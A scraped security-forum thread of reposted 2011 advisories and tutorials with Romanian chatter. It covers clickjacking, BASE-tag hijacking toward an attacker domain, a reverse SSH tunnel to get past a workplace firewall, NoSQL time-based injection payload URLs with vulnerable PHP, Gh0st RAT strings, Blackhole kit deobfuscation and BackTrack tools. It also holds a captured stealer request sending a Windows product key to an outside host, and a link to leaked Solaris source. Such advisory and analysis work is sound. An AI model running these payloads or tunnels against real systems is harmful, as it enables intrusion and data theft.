Nytro

Silly PoCs continue: X-Frame-Options give you less than expected From: Michal Zalewski <lcamtuf () coredump cx> Date: Fri, 16 Dec 2011 11:21:49 -0800 [ Resubmitting - I think the original post did not go through last week, but some of the responses did, so probably an accident. ] --- I think we greatly underappreciate the extent to which JavaScript allows you to exploit the limits of human perception. On modern high-performance systems, windows can be opened, positioned, and closed; and documents loaded and then navigated away from; so quickly that we can't even reliably notice that, let alone react consciously. The PoC I posted here earlier this week (Beaver Peak Banking and BBQ) demonstrates one example of page transitions occurring so fast that you don't register it; and some of my earlier posts outlined the exploitation of page switching to exploit browser UIs (e.g. http://lcamtuf.coredump.cx/ffgeo2/). Today, I wanted to share this brief demonstration of an attack that should hopefully illustrate why our current way of thinking about clickjacking (and the possible defenses, such as X-Frame-Options) is flawed: http://lcamtuf.coredump.cx/clickit/ The basic idea here is that instead of placing the UI you want to tamper with in an invisible or only partly-visible <iframe>, you can achieve a similar effect simply by predicting the time of a premeditated click (which is fairly easy if you look at mouse velocity and distance to the expected destination), and then either destroying the current window, or navigating to a different document (in this case, a cheesy banking site). While everything about this exploit is extremely goofy, and I put no effort into making the transitions less obvious, it should still demonstrate the issue neatly. /mz Sursa: Bugtraq: silly PoCs continue: X-Frame-Options give you less than expected

<BASE> tag used for hijacking external resources (XSS) From: Bouke van Laethem Date: Thu, 15 Dec 2011 23:53:26 +0100 I report this here because I could not find any other reference to this issue. VULNERABLE: Chrome, firefox and safari. NOT VULNERABLE: IE8 or IE9. (Above is as far as I could tell: things are moving fast nowadays in browser land) ISSUE: The <base> tag is parsed outside of <head></head>. This can lead to the base being reset, both before and after the <base> tag being injected, depending on browser types and versions. As a result, images and javascript can be loaded from an attackers domain, and forms and hyperlinks point to the attackers domain. An example can be found on http://avuko.net,'>http://avuko.net, but it is simple enough to reproduce: just put a <base href="http://attackerdomain";> somewhere in your HTML (the closer to <head> the better). Tested with overriding <img>, <a>, <script> & <form>, would probably work on other external references too. FIX/WORK-AROUND: make sure all paths are absolute. REFERENCES: http://www.w3.org/TR/html4/struct/links.html#h-12.4 http://avuko.net -- Be strict when sending and tolerant when receiving. [RFC 1958, 3.9] Sursa: Bugtraq: <BASE> tag used for hijacking external resources (XSS)

Bypassing NAT with client to client SSH connections Posted: December 19, 2011 in Guides Okay, well I know it’s been entirely too long since I’ve written anything here, and for those of you who know me personally you know I’ve had a very hectic schedule of late. Sorry for the delay in posting, also the Ubuntu 12.04 LTS desktop and server security guides have been delayed. I’m hoping to have at least one of them up after the holidays, but no promises. So to tithe you over for a little bit, and to get a new post up here, I’m going to discuss something that a lot of people ask about on Ubuntu Forums. It is against Ubuntu forums policy to instruct people how to bypass the security of a network they do not own. This however, is my personal blog and I will instruct whatever I want That being said, if you do this at work and get fired it’s your fault, most sysadmins will frown on this, and yes they will catch you. This is not really a new trick, but it will bypass NAT and allow you to have an always on SSH connection to an endpoint behind a NAT router (with no ports forwarded). This requires three systems. The endpoint (which is behind the firewall), the middleman, which is a machine you control somewhere on the internet, and the machine you want to ssh from (presumably your home machine or another system that you control). Note : For the purposes of this guide the following IP’s are used as a point of reference. Middleman : 192.168.0.15 Endpoint Behind Firewall : 172.16.128.4 Machine that you’re SSH’ing from : 192.168.0.14 So here we go. Setting up the Middle Man First things first, we need to install to install an openssh-server on our middleman and configure it as a gateway. Note : This is done on Ubuntu, change commands appropriately for your operating environment. sudo apt-get install openssh-server Now we want to edit /etc/ssh/sshd_config and add the following lines. GatewayPorts Yes TCPKeepAlive Yes This will keep our connections alive and allow us to tunnel through this system. Creating a Reverse Connection From the Endpoint Now on the endpoint machine (the one behind the firewall) we will create a reverse connection to our middleman server. This will bypass our firewall. We can automate this process by creating a cron job. However, if we do this we must use passwordless login with keys. I’m lazy so I didn’t generate keys here. ssh -R 31337:localhost:22 dangertux@192.168.0.15 What this does is create a reverse connection and tunnel to 192.168.0.15 Connect From Your Machine Now we connect to the middleman server from our machine. ssh -p 31337 dangertux@192.168.0.15 Note: the password you are prompted for will be the password of the user on the machine behind the firewall. There you go, an always on SSH client – client connection that bypasses NAT routing. Again, a friendly warning, a sysop will not take DT told me to as an excuse, besides I didn’t tell you to, I told you how Sursa: SSH Hacks : Bypassing NAT with client to client SSH connections

[h=3]FindBugs v.2.0 - Find Bugs in Java Programs[/h][h=2]Sunday, December 18, 2011 (d3v1l)[/h] A static analysis tool to find bugs in Java programs. FindBugs is an open source program created by Bill Pugh and David Hovemeyer which looks for bugs in Java code.It uses static analysis to identify hundreds of different potential types of errors in Java programs.FindBugs operates on Java bytecode,rather than source code.The software is distributed as a stand-alone GUI application. There are also plug-ins available for Eclipse,Netbeans,IntelliJ IDEA,and Hudson. First Look: FindBugs 2.0 Download: http://findbugs.sourceforge.net Sursa: Security-Shell: FindBugs v.2.0 - Find Bugs in Java Programs

HTML5 web security December 6th, 2011 Document Name: HTML5_Web_Security_v1.0.docx Version: v1.0 Author: Michael Schmidt, Compass Security AG Reviewer: Thomas Röthlisberger, Compass Security AG Date of Delivery: December 6th, 2011 Classification: Article Overview to HTML5 web security by Michael Schmidt [michael.schmidt-@-csnc.ch], reviewed by Thomas Röthlisberger [thomas.roethlisberger-@-csnc.ch] This article is an extract of the master thesis written by Michael Schmidt. The security relevant aspects of HTML5 that were considered in this thesis are covered in the subsequent document. It needs to be considered that the content of this document was released in May 2011. Compass Security makes regular updates to its HTML5 security know how and provides additional information. Please visit Compass Security AG - Switzerland or contact us for the most current version. Download: http://media.hacking-lab.com/hlnews/HTML5_Web_Security_v1.0.pdf

Time-Based Blind NoSQL Injection Authored by Felipe Aragon | Site syhunt.com Posted Dec 19, 2011 This is a brief write up discussing time-based NoSQL injection attacks using javascript. Time-Based Blind NoSQL Injection - Detecting server-side JavaScript injection vulnerabilities In July 2011, Bryan Sullivan, a senior security researcher at Adobe Systems, demonstrated server-side JavaScript injection vulnerabilities in web applications using MongoDB and other NoSQL database engines. He demonstrated how they could be used to perform Denial of Service, File System, Remote Command Execution, and many other attacks, including the easy extraction of the entire contents of the NoSQL database -- a blind NoSQL injection attack (paper here at https://media.blackhat.com/bh-us-11/Sullivan/BH_US_11_Sullivan_Server_Side_WP.pdf). We not only confirmed the published data about the NoSQL injection vulnerabilities, but also discovered that the MongoDB shell supports a sleep() function which makes time-based detection possible of vulnerable web applications. It is also possible to inject a custom sleep code, a technique that may be used to spot injection vulnerabilities in web applications using server-side JavaScript execution. This is not restricted to MongoDB. Below you can find two examples of NoSQL injection vulnerabilities in PHP that could be spotted using these techniques. Example 1: NoSQL Injection Vulnerability in PHP The following requests would make these (or similar) vulnerable web application sleep for 10 seconds: vulnerable.php?msg=1';sleep(10000);var%20foo='bar The MongoDB sleep() function works with milliseconds. Alternative technique using a custom sleep code: vulnerable.php?msg=1';var%20d%20=%20new%20Date();%20var%20cd%20=%20null;%20do%20{%20cd%20=%20new%20Date();%20}%20while(cd-d%20<%2010000);var%20foo='bar <? $mongo = new Mongo(); $db = $mongo->demo; $id = $_GET['id']; $js = "function() { var id = '$id'; SOME CODE... }"; $response = $db->execute($js); ... ?> Example 2: NoSQL Injection Vulnerability in PHP <? $mongo = new Mongo(); $db = $mongo->demo; $year = $_GET['year']; $collection = $db->demo; $query = 'function() {var search_year = \'' . $year . '\';' . 'return this.publicationYear == search_year || ' . ' this.filmingYear == search_year || ' . ' this.recordingYear == search_year;}'; $cursor = $collection->find(array('$where' => $query)); ... ?> Example 3: Sleep in JavaScript var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < 10000); // delay time (ms) Solution Always validate user input used in server-side JavaScript commands. Article by Felipe Aragon. Originally published at http://www.syhunt.com/?n=Articles.NoSQLInjection --- Copyright © 2010 Syhunt Security Disclaimer: The information in this article is provided "as is" without warranty of any kind. Details provided are strictly for educational and defensive purposes. Syhunt is not liable for any damages caused by direct or indirect use of the information provided by this article. Sursa: Time-Based Blind NoSQL Injection ? Packet Storm

[h=1]Oracle Solaris 11 Kernel Source Leaked[/h]December 19th, 2011, 14:00 GMT · By Marius Nestor As Phoronix announced a couple of minutes ago, it appears that a snapshot of the kernel source code for Oracle's Solaris 11 operating system has been leaked on major torrent and file hosting sites. Searching "solaris11.tar.bz2" on Google, Softpedia can also confirm that the bzip2 archive of about 104 MB contains the source code of Oracle Solaris 11's kernel. Being a closed source operating system, Oracle is probably trying right now to delete the leaked Solaris 11 kernel archive from aforementioned sites. The Oracle Corporation announced the Oracle Solaris 11 cloud operating system on November 9th, supporting the security, scalability and performance requirements of cloud-based deployments. Oracle Solaris 11 brings features like the ZFS filesystem, virtualization capabilities, comprehensive management, "secure by default" features, cloud-scale life cycle management, SPARC and x86 certified. Download Oracle Solaris 11 right now from Softpedia. Mirror: Download solaris11.tar.bz2 for free on uploading.com Sursa: Oracle Solaris 11 Kernel Source Leaked - Softpedia

[h=1]Analyzing malware using Sysinternals’ VMMap[/h]Posted by Chief Banana on December 19, 2011 In May 2011, Sysinternals released a new tool called ‘vmmap’. According to the website: ‘VMMap is a process virtual and physical memory analysis utility. It shows a breakdown of a process’s committed virtual memory types as well as the amount of physical memory (working set) assigned by the operating system to those types. Besides graphical representations of memory usage, VMMap also shows summary information and a detailed process memory map’. While analyzing a piece of malware for a chapter in a book, I discovered the great usage of this tool. I already identified that a suspicious connection was using the PID of 1040. Investigating the processes around this PID, it became clear that this PID belonged to one of the ‘svchost’ processes. Another interesting file that was used by this process was called ’6to4ex.dll’ Opening VMMap from a forencic cd-rom, the tools asked for the starting process. In this case I selected the option ‘ SVCHOST’ with the PID of 1040. Next the breakdown of this process committed virtual memory types and used files are visible. Under the svchost process overview, the ’6to4ex.dll’ file was also shown. Selecting this file and using the shortcut ‘CTRL+T’, which activates the strings view command, very interesting strings about this file became visible: The interesting strings about the malware used and capabilities: · ‘%s\shell\open\command · Gh0st Update · E:\gh0st\server\sys\i368\RESSDT.pdb · \??\RESSDTDOS · ?AVCScreenmanager · ?AVCScreenSpy · ?AVCKeyboardmanager · ?AVCShellmanager · ?AVCAudio · ?AVCAudiomanager · SetWindowsHookExA · CVideocap · Global\Gh0st %d · \cmd.exe By searching for more details around the term ‘Gh0st’ and backdoor it became clear that this might be a Chinese Remote Access Tool (RAT) that is common known to be used in targeted attacks. Features of this RAT are: capturing audio/video/keystrokes, remote shell, remote command, file-manager, spying the screen and many more. Definately VMMap will be part of my malware IR-kit Sursa: Analyzing malware using Sysinternals’ VMMap | securitybananas.com

NoScript detection with CSS <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Test</title> </head> <iframe src="detection.html" width="180" id="testframe"></iframe> <script type="text/javascript"> document.getElementById("testframe").style.width = "400px"; </script> </html> detection.html: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>detection</title> <style type="text/css"> .active { display:none; } .notactive { display:block; } @media screen and (max-width: 200px) { .active { display:block; } .notactive { display:none; } } </style> </head> <body> <div class="active">Noscript is active</div> <div class="notactive">Noscript is not active</div> </body> </html> Sursa: Test Tricky...

GET /steler/index.php?action=add&a=4&c=JOHN-66E06C37B1&u=-&l=Microsoft Windows XP Professional&p=VGBRV-X2DDM-JYDFW-22MQW-3G39Y HTTP/1.1 Accept: */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) Host: www.cruciatii.in Connection: Keep-Alive @alexbest Ban permanent. Daca doriti sa discutati cu el: cs.alexbest @ IM E din Stefanesti, probabil e de la tara, deci na... Deci programul e de fapt Stealer de Firefox si probabil si altele.

[h=1]Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages[/h]By Lucian Constantin Dec 19, 2011 3:50 pm Attackers can force mobile phones to send premium-rate SMS messages or prevent them from receiving messages for long periods of time by leveraging a logic flaw in mobile telecommunication standards. The flaw was discovered by independent security researcher Bogdan Alecu, who demonstrated how it can be exploited at the DefCamp security conference in Romania on Saturday. Alecu exploited the way mobile devices process text messages intended for special applications called SIM Toolkits, which he said are preloaded on SIM cards by over 90 percent of mobile operators. The applications can perform actions that include checking credit or voice mail, calling emergency numbers or customer support, and even performing mobile banking, and typically appear on the phones as a menu or application bearing the operator's name. SIM Toolkits can receive commands through specially-formatted SMS messages, but in order for these commands to be executed successfully, the message headers must contain a valid digital signature. The vast majority of mobile phones don't display any notification when they receive SIM Toolkit messages, he said. Some wake from their sleep state, but no message is visible in the inbox and there's no other indication that a message was received. The encryption used to verify message authenticity is pretty solid and can't be cracked, Alecu said. Instead, his attacks rely on phones automatically returning error messages rather than executing legitimate commands. [h=2]Automatic Replies by Default[/h] Error replies are sent automatically. Users of some phones might see a message is being sent, but they can't usually stop it. Alecu tested his exploits on phones from various manufacturers. Only devices from Nokia have an option to ask phone owners to confirm sending a SIM Toolkit response. The option, "Confirm SIM Service Actions," is usually off by default, especially on phones configured by operators. He tested phones from High Tech Computer (HTC) and Samsung Electronics running stock Android firmware, and an LG Optimus One with CyanogenMod, a community-built version of the popular mobile operating system. None of them displayed a notification when sending SIM Toolkit responses, and he found no option to block responses. BlackBerry devices presented a similar behavior, he said. Windows Mobile 6.x devices and iPhones notified users a message was being sent, but offered no way to stop it. Alecu hadn't yet tested a Windows Phone 7 device. The sender of a SIM Toolkit service message can request that the phone reply via SMS either directly to the sender's number, or to the operator's message center, according to Alecu. [h=2]How Scammers Attack[/h] Those two options give rise to two different attack scenarios, he said. For the reply-to-sender option (SMS-SUBMIT), an attacker could force the sending of the error message to a premium-rate number using an SMS spoofing service. SMS spoofing is the practice of changing the originating number of a text message to anything the sender desires. This can have legitimate as well as malicious purposes, and there are many online services that provide the feature for a small fee. Some mobile operators have strict rules on setting up premium-rate numbers. Applicants might be asked to prove that they are a registered business and provide information about how the number will be used. Restrictions can also be placed on the text strings that a message must contain in order for the sender to be charged, which would limit this attack because the attacker can't control the content of the automatic response. However, the number and diversity of existing SMS scams is proof that obtaining a premium-rate number is not that difficult. If the second option (SMS-DELIVER-REPORT) is used, the error is sent to the operator's message center where it is interpreted as a message delivery failure. When messages can't be delivered, because a phone is turned off or outside the service area, operators usually attempt to resend the undelivered message every few minutes for a predefined period of time. When this happens, all subsequent messages intended for that number are placed in a queue to be delivered when the phone re-joins the network. Because receiving a bogus SIM Tookit message will always result in an error response, a loop is created between the message center and the phone, preventing the subscriber from receiving legitimate messages. This denial-of-service (DoS) condition is not permanent and after a while, typically 24 hours, the undelivered message is automatically discarded. However, if an attacker were to send seven bogus SIM Toolkit messages one after the other, the message center would attempt to deliver each of them for 24 hours, resulting in a week of SMS DoS. [h=2]Flaw Revealed[/h] Alecu demonstrated the attacks on SIM cards from multiple operators in Romania, Bulgaria, Austria, Germany and France. However, since the attacks exploit a logic flaw in the GSM standard and later mobile standards, he believes that the majority of operators that use SIM Toolkits are affected. Mitigating the attack is possible at both operator and device level. Operators can filter SIM Toolkit messages and restrict which numbers are allowed to send them. This would be an elegant solution, but Alecu has yet to find an operator that implemented it. Phone manufacturers could enforce confirmation for SIM actions from their software. However, this fix will probably not be as effective as message filtering at operator level, Alecu said. Firmware updates are not always easy to install, especially on older phones. Performing a firmware upgrade in the wrong way can render devices unusable and many affected phones might not even be supported anymore. The U.S. Computer Emergency Readiness Team (US-CERT) was notified of the problem in August 2010, and was asked to coordinate the disclosure process, Alecu said. He said Research In Motion (RIM) has contacted him and is working on a fix. "We are aware of the claims and are investigating them," Nokia spokesman Tomi Kuuppelomäki said. Samsung, HTC, RIM and Apple did not return a request for comment. Sursa: Remote SMS Attack Can Force Mobile Phones to Send Premium-rate Text Messages | PCWorld Business Center

Aici nu exista fete sau baieti, exista membri, indiferent de sex. Motivul e simplu: se fac discriminari sexuale, etnice sau de orice alt fel. Dar credem in libertatea de exprimare, deci sunt permise.

"If it is not free, it is a product. If it is free, maybe you are the product."

Microsoft si-a lansat retea sociala (Video) Autor: Emilian Nedelcu Luni, 19 Decembrie 2011, ora 08:24 Compania Microsoft a lansat de curand o retea sociala, numita So.cl (se citeste "social"), care deocamdata este disponibila unui numar strans de persoane. Reprezentantii companiei au declarat de So.cl va fi o retea sociala destinata studentilor, pentru a-i ajuta sa-si impartaseasca informatii in mod rapid, sa construiasca pagini sau sa obtina rapid informatii, pentru a transforma Internetul si retelele sociale existente intr-o mare sala de clasa. Similar, Facebook, cea mai mare retea sociala din lume, cu peste 800 de milioane de utilizatori, a fost destinata, initial, doar unui numar restrans de studenti. So.cl este un proiect de cercetare experimental, potrivit oficialilor Microsoft, care este disponibil studentilor din facultatile de informatica si de design din Washington University, Syracuse University si New York University. In timp, vor fi adaugate si alte universitati. So.cl a fost proiectat pentru studenti pentru a le extinde experienta educationala si pentru a-i ajuta sa regandeasca modul in care pot invata si comunica. Utilizatorii retelei pot scrie articole, care sa fie inconjurate de elemente precum fotografii, video sau text. Utilizatorii pot identifica alti utilizatori cu interese similare, iar reteaua permite construirea de comunitati in jurul unui anumit scop (educational). Pana in acest punct, reteaua So.cl nu spune nicio noutate, toate aceste functionalitati fiind prezente, spre exemplu, si in Facebook. Utilizatorii So.Cl pot urmari alte persoane, sau pot seta feed-uri. De asemenea, utilizatorii pot urmari doar anumiti oameni sau pot vedea ce scriu toti prietenii inregistrati. Sursa: Microsoft si-a lansat retea sociala (Video)

Nu, asta e Gecko al nostru: Gecko (layout engine) - Wikipedia, the free encyclopedia

A, facut de tine, felicitari. Dar parca arata mai bine prima versiune.

Glume cu "bucatarie", sigur e fata. Bine ai venit.

Reverse Engineering Mac OS X Mac OS X - 2005 and before Mach-O Infection.ppt (presentation) Breaking Mac OS X.ppt (presentation) Hacking Mac OS X Kernel for unsupported machines.pdf (paper) MacOS Kernel Insecurity.pdf (presentation) Overriding Mac OS X.pdf (paper) A Debugger with Gui in OS X.pdf (paper) - 2006 Abusing Mach on Mac OS X.pdf (paper) - 2007 Hacking Leopard.pdf (paper) Inside the Mac_OS X_kernel.pdf (paper) - 2008 BlackHat-Japan-08-Miller-Hacking-OSX.pdf (presentation) BH-US-08-Dtrace The Reverse Engineer’s Unexpected Swiss Army Knife (presentation) iRK – Crafting OS X Kernel Rootkits (presentation) RETrace – Applied Reverse Engineering on OS X – defcon-16.pdf (presentation) Under the iHood – REcon 2008.pdf (presentation) Covering-tracks-Mac-OS-leopard_5991.pdf (paper) OSX_Rootkits – the next level.pdf (presentation) - 2009 Advanced Mac OSX Rootkits.pdf (paper) Defcon-17-bosse_eriksson-kernel_patching_on_osx.pdf (presentation) D1T1 – Dino Dai Zovi – Mac OS Xploitation.pdf (presentation) Advanced-Mac-OS-X-rootkits.pdf (presentation) Dynamic Tracing for Exploitation and Fuzzing-final.pdf (presentation) Mac-os-malware-analysis_33178.pdf (paper) Objective-c-internals.pdf (presentation) Hacking Macs for Fun and Profit – csw09-daizovi-miller.pdf (presentation) Macos xploitation-source2009.pdf (presentation) Debugging Cocoa with DTrace.pdf (paper) BlackHat-DC-09-Iozzo-Macho-on-the-fly.pdf (presentation) Dynamically Overriding Mac OS X – Down the Rabbit Hole.pdf (presentation) Encryption Wrapper on OSX.pdf (presentation) - 2010 Function-hooking-for-OSX-and-Linux.pdf (presentation) Mac Os X Hacking SnowLeopard.ppt (presentation) BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-slides.pdf (presentation) BH-DC-2010-Advanced-Mac-OS-X-Physical-Memory-Analysis-wp.pdf (paper) Post exploitation techniques on OSX and Iphone – eusecwest.pdf (presentation) Programacion de rootkits en Mac OS X.pdf (paper, in Spanish) - 2011 Defiling-Mac-OS-X-Kernel-Rootkits-Ruxcon.pdf (presentation) Hacking at mach2.pdf (presentation) The Apple Sandbox – BHDC2011-Paper.pdf (paper) The Apple Sandbox – BHDC2011-Slides.pdf (presentation) Battery Firmware Hacking.pdf (paper) iSEC_BH2011 – Macs in the Age of APT.pdf (presentation) iOS - 2009 BlackHat-Europe-2009-Miller-Iozzo-OSX-IPhone-Payloads-whitepaper.pdf (paper) - 2010 iPhone Rootkit Toorcon 2010.pdf (presentation) D2T1 – Cedric Halbronn and Jean Sigwald – iPhone Security Model.pdf (presentation) - 2011 D1T2 – Laurent Oudot – Extracting Senstive Data from Your iPhone.pdf (presentation) D2T2 – Jean-Baptiste Be?drune & Jean Sigwald – iPhone Data Protection in Depth.pdf (presentation) Auditing iPhone and iPad applications – van Sprundel.ppt (presentation) Practical Consideration of iOS Device Encryption Security.pdf (paper) Apple iOS 4 Security Evaluation.pdf (presentation) BH_US_11_DaiZovi_iOS_Security_WP.pdf (paper) BH_US_11_Belenko_iOS_Forensics_Slides.pdf (presentation) BH_US_11_Belenko_iOS_Forensics_WP.pdf (paper) BH_US_11_Esser_Exploiting_The_iOS_Kernel_Slides.pdf (presentation) BH_US_11_Esser_Exploiting_The_iOS_Kernel_WP.pdf (paper) D2T1 – Stefan Esser – iPhone Exploitation – One ROPe to Bind Them All.pdf (presentation) D2 SIGINT – Keith Lee – iPhone Espionage.pdf (presentation) D1T1 – Stefan Esser – Antid0te 2.0 – ASLR in iOS.pdf (presentation) SysScan-Singapore-Targeting_The_IOS_Kernel.pdf (presentation) Sursa: Papers | Reverse Engineering Mac OS X

[h=3]SEH Hooking[/h][h=2]Saturday, December 17, 2011[/h] In this example, I will cover a method of hooking which uses SEH (Structured Exception Handling) in order to hook code in any location without overwriting the code. This method of hooking is very much alike the SEH Hooking which is used by many debuggers to place breakpoints, but has two small differences. Instead of writing INT3 Breakpoints and catching the BREAKPOINT Exception, I'm setting the memory to PAGE_NOACCESS and catching the ACCESS_VIOLATION Exception. Instead of writing the address of my handler to the PEB directly, I'm using a VEH (Vectored Exception Handler), which is being added using the AddVectoredExceptionHandler() WinAPI Function. This method of hooking works by modifying the protection of a byte of memory at the location of our hook to PAGE_NOACCESS. When this memory is executed, our VEH catches an ACCESS_VIOLATION Exception. It then checks the instruction pointer to see if the violation occurred at the location of our hook. If this ACCESS_VIOLATION is not our hook, we return CONTINUE_SEARCH to allow other handlers to work with the exception. However, if it is our hook, we do 3 things: Execute our hook's callback Restore the memory access to its original state Set the trap flag, which will trigger a single step We then return CONTINUE_EXECUTION. This time, the hooked code executes it's first byte flawlessly and then triggers a SINGLE_STEP Exception. This single step is a result of setting the trap flag, and it allows us to set the hooked memory back to PAGE_NOACCESS so our hook will execute again the next time the hooked memory is accessed. Since our exception handler's ContextRecord contains a pointer to the top of the stack, we are also able to access function arguments and find return addresses. Because of this, we can block the execution of a function or change the input, just like in a normal hook. To block execution, we can place a JMP [ReturnAddressFromStack] in our hook handler. While this jumps right back into execution and skips steps 2 and 3 of our exception handling, it is jumping back to the calling function and not the hooked code. The NOACCESS remains in place for next time. While this rendition of SEH Hooking isn't flawless, it does illustrate the concept and get the job done. In most cases, if you plan on using SEH Hooking, I would recommend using INT3 Breakpoints, though. This method, however, is a good way to bypass modification detection. While programs may checksum their code, they don't usually verify the memory protection of every page in the program. In the example code, I hook the MessageBoxA() WinAPI Function. Inside my handler, I call printf() to print the caption and text to the console. I then block execution of MessageBoxA(). Sursa: Rev++: SEH Hooking

[h=3]Intro to javascript malware analysis[/h] Posted by Ax0n I am by no means an expert on this stuff. A few weeks ago, I ran across some suspicious links in spam and decided to see where they led. Some of them claimed to be from financial institutions that I have absolutely no connection to, and claimed that some transaction had failed to occur. Others were variants of shipping confirmation scams, pharmacy junk, etc. I wish I could say that I have no idea how people fall for these, but the fact is that some people will literally click on anything that shows up in their inbox, open any attachment and follow any link, no matter how blatantly fake we professionals think these scams are. What lay at the tail end of all the script="http://some-site/whatever.js" includes and document.location redirects? A webpage that'd been owned, filled with a huge pile of nonsensical jibberish that could barely pass as javascript, which happened to be part of the Blackhole Exploit Kit. I've done my share of picking apart obfuscated javascript before, but it had been a while. I gave a presentation of this same thing at KC2600 a few weeks ago. Then, this week, a colleague of mine who missed the meeting ran into the same thing in the wild. I passed on what I'd learned, and decided it might be time to write it up with a little more detail than I did a few weeks back. He made this quick video that covers how he was able to de-obfuscate this particular sample: By now, I've seen several different obfuscation schemes for BlackHole, but once it's decoded, it all looks about the same. The introductory basics are simple. Minimize the potential of infection by using a non-privileged account (and perhaps an OS other than Windows) and/or minimize the impact of a successful infection by running a virtual machine that you can blow away or revert to a snapshot of a known clean state. For the malware I'm using in this example, either (or both) of the above criteria will be ample to keep things from getting out of control. Other malware may be more insidious or may target non-Windows platforms. I have a few friends that have unwittingly infected their own workstations while trying to analyze things. Play safe. Once you have a safe lab environment, your goal is to examine a suspicious link and dissect it. In my case, I was able to find a few links to malware in my personal mail's spam folder. For the demo at KC2600, I used Malware Domain List to find some Blackhole samples. In the wild, there may be any number of redirects ahead of the malware. You may see a shortened URL (through goo.gl, tinyurl, etc) which goes to a sparse HTML page with several calls to javascripts hosted on various sites, and those javascripts may simply be a document.location pointing to the malware. I usually stick with curl or wget to pull down suspicious links, and then I keep looking at the content and following the redirects until I strike gold. The javascript itself is ugly once you get to it. Sometimes, the byte array is only a few (really long) lines. Other times, like this sample, each byte of the obfuscated data is on a new line, like this: You'll see a few interesting things. There's an "e=eval;" line near the bottom, and then "e©;" after that. It doesn't take a coding genius to realize that this is a way to call eval© without triggering some IDS signatures that look for "eval(". Many samples I saw weren't quite this obvious. In fact, the script in the video has the eval alias in a different part of the script. In fact, the script in the video varies in several ways. To turn this cryptic payload into something that resembles actual javascript, there's a post on SANS ISC from several years ago covering a few methods. I went with the so-called Tom Liston Method, essentially trying to wrangle the decoded stuff that was destined for the exec function into a document.write within a textarea box instead. Note: I ran into one sample of BlackHole that has a /textarea tag near the beginning, which would keep someone from using this trick to easily view the code with this trick, but I don't think it will exec the stuff behind it since it's been changed to a document.write. In the above example (and in the video), the content that is destined for exec is stored in variable "c", so you simply replace "e©;" with: document.write("<textarea cols="150" rows="100">" + c + "</textarea>"); But obviously, you need to use some brain power here to figure out what trickery they're using to call exec, and what the variable is that needs to be wrapped up in the above document.write command. You may also wish to mess with the rows and columns on the textarea. I know on my netbook, that textarea size is far too unweildy. On my desktop, it's almost perfect. Make sure the file is renamed as a .html, then load it up in your safe lab environment's browser, just in case something goes wrong. Voila. If you scroll through recent versions of BlackHole Exploit Kit, you'll see that it tries to load an embedded java applet and a PDF, both of which are designed to exploit recent vulnerabilities in JRE and Adobe Reader. Since I don't have Windows running in a VM environment (and I'm not keen on actually infecting any of my Windows boxes) I'm not entirely sure what gets loaded from there. I'm guessing the carberp trojan, given most of what I've read lately. If that's the case, a successful infection would likely block access to anti-malware sites, try to sabotage existing security software, and start gathering sensitive data such as card numbers and online banking credentials. Sursa: HiR Information Report: Intro to javascript malware analysis

[h=2]Web Analysis, Vulnerability Assessment and Exploitation using Backtrack5[/h] December 16th, 2011|By: Hari Krishnan Web application analysis plays a major role while doing a vulnerability assessment/penetration test. Proper information about the web application (for example like type of plugins used; CMS type – whether it is joomla, wordpress, etc.) can help the pentester determine the right exploit to use, as well reduce the overall time spent in doing so. Backtrack 5 comes with a very good set of tools required for performing all necessary information gathering. Tools for performing web application analysis are: CMS Identification IDS/IPS Detection Open Source Analysis Web Crawlers Vulnerability Assessment and Exploitation Maintaining Access [h=2][/h] [h=2]CMS Identification:[/h] blindelephant cms-explorer whatweb [h=3]BlindElephant[/h] BlindElephant is a python based tool for fingerprinting the web applications. This tool basically attempts to discover the version used by comparing the static files at certain known locations against the hashes which are pre-computed for the versions of those files. The tool is fast, non-invasive, takes low bandwidth and is highly automated. Usage: root@root:/pentest/web/blindelephant/src/blindelephant#python BlindElephant.py [options] url appName We can use the appName as “guess” if we are not sure about the web application or plugin type used. [h=3]CMS-Explorer[/h] CMS-explorer is another web application fingerprinting tool (written in perl) which can be used to identify the type of cms used and hence, perform the attack according to the information. There are few advantages in this tool, such as checking for any vulnerability from OSVDB for the particular plugin or CMS detected, updating the list of WP, Drupal, verbosity, looking into themes, and so forth, all of which gives the pentester a lot of information for performing the PT. Usage: root@root:/pentest/web/cms-explorer# python cms-explorer.pl -url target -type type [options] [h=3]WhatWeb[/h] WhatWeb is again used to identify the type of content management systems (CMS), blogging platforms, stats/analytics packages, javascript libraries and servers used. This tool has over 900 plugins for scanning purposes, supporting proxy (including TOR), can defined with ip ranges similar to NMAP, fuzzing matching, and so forth. Usage: root@root:/pentest/web/whatweb# ./whatweb target.com ./whatweb –l will list the plugin list. [h=2]IDS-IPS detection[/h] While performing a VA/PT on a domain, there is the chance that IDS-IPS is installed. This can sometime stop various types of attacks performed on the domain. A lot of WAFs are sold to companies as a valid mitigation technique for web application vulnerabilities. Luckily, WAF is easy to detect because most of these use signature-based detection methods. Thus, the attacker can try to encode the attacking parameters and try to bypass the WAFs. Backtrack comes with two handy tools for detecting the IDS-IPS and they are waffit ua-tester [h=3]Waffit:[/h] Waffit is a web application firewall detection tool. Detecting the firewall behind the domain is a very important step during the penetration testing process. WAF can sometimes introduce vulnerabilities if it’s not configured. Analyzing them is also a major concern while doing a VA/PT. WAFs are usually easy to detect and they can be bypassed by encoding the attack parameters . Usage: root@root:~$python wafw00f.py Target.com : Furniture, Baby, Electronics, Toys,...: Target [h=2][/h] [h=2]Open-Source Analyses:[/h] Open-source analyses are conducted using tools like ghdb, revhosts, xssed, maltego . The ghdb and xssed are linked to websites, while the other two are tools. GHDB: GHDB stands for Google Hacking Database. The exploit-db team maintains a database for 